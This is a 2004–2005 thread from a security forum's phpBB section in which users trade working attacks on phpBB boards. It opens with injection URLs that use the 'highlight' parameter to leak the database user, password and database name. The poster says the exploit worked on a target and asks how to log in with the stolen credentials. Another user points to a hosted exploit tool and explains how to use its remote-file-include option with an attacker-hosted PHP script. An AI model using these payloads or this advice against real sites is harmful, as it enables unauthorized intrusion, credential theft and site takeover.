|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 56
Members: 0
Total: 56
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpbb |
|
Posted: Fri Dec 31, 2004 6:30 pm |
|
|
Injector |
Active user |
|
|
Joined: Dec 29, 2004 |
Posts: 49 |
|
|
|
|
|
|
|
Code: | 1. "username" is $dbuser:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbuser.%2527
2. "username" is $dbpasswd:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbpasswd.%2527
3. "username" is $dbname:
http://www.phpbb.com/phpBB/viewtopic.php?p=1316231&highlight=%2527.$poster=$dbname.%2527
|
I used that exploit and it worked. Now how do i use the dbname and dbpasswd? where do i log in. I tried logging in to mysql but it says permission denied.
Where do I log in? |
|
|
|
|
Posted: Sun Jan 02, 2005 2:22 pm |
|
|
hebe |
Advanced user |
|
|
Joined: Sep 04, 2004 |
Posts: 59 |
|
|
|
|
|
|
|
in most severs mysql is open only for local not remote access |
|
|
|
|
Posted: Mon Jan 03, 2005 12:22 pm |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
You can use the exploit to control mySQL. You can make some scripts in php to read or modify database.
here is the exploit
Code: | http://www.mendozarranca.com/themes/MendozaArranca/style/ |
Use the option INCLUDE and remember to add a ? at the end of your INCLUDE URL |
|
|
|
|
Posted: Tue Jan 04, 2005 5:19 am |
|
|
Injector |
Active user |
|
|
Joined: Dec 29, 2004 |
Posts: 49 |
|
|
|
|
|
|
|
I get this error I dont seem to know why
Code: | The topic or post you requested does not exist |
There are three boxes.
On the first one I wrote "http://www.site.us/forum/" (I chose Include)
On the second on e i worte "t=10" (this topic ID does exist)
On the third one I wrote "http://site.com/ws.php?" |
|
|
|
|
Posted: Wed Jan 05, 2005 11:41 am |
|
|
ReFleX |
Active user |
|
|
Joined: Nov 05, 2004 |
Posts: 39 |
Location: ARGENTINA! |
|
|
|
|
|
|
It have to work.. try with another topic.... I really sont know what could be the problem The error tells you that this topic doent exist |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|